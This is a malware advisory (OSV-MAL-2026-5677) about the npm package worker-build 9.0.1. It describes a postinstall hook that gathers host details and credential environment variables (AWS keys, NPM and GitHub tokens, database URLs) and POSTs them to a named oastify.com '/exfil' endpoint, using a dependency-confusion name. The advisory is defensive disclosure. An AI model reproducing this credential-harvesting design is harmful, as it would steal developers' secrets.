OSV-MAL-2026-5677

Malicious code in worker-build (npm)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (0e11b6161f4fe3c591bddadbf275003eaac33a1478cda408ac51d85230292e6d) package.json declares `"postinstall": "node main.js"`, so installation of worker-build@9.0.1 unconditionally executes main.js on `npm install`. main.js collects host identity (os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), process.argv), reads the consumer's package.json, runs `git config --get remote.origin.url`, and iterates a hardcoded list of credential-shaped environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, NPM_TOKEN, GITHUB_TOKEN, GITLAB_TOKEN, API_KEY, SECRET_KEY, PASSWORD, TOKEN, DATABASE_URL, MONGODB_URI, REDIS_URL), capturing the first 50 characters of each populated value. The collected JSON payload is POSTed in cleartext to `http://jh4wt1kccd0ul174qgmge9n8izozcu0j.oastify.com/exfil` and `/api/exfil`, with an additional DNS lookup against the same host as a side-channel beacon. The package name mimics legitimate Cloudflare Workers build tooling, positioning the package for dependency-confusion against installers that misresolve an internal name to the public registry. ## Source: ossf-package-analysis (b5005e4bec545b403f3be10160a08d634d34b5d8ab8e76a185a4a5ba34706719) The OpenSSF Package Analysis project identified 'worker-build' @ 9.0.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.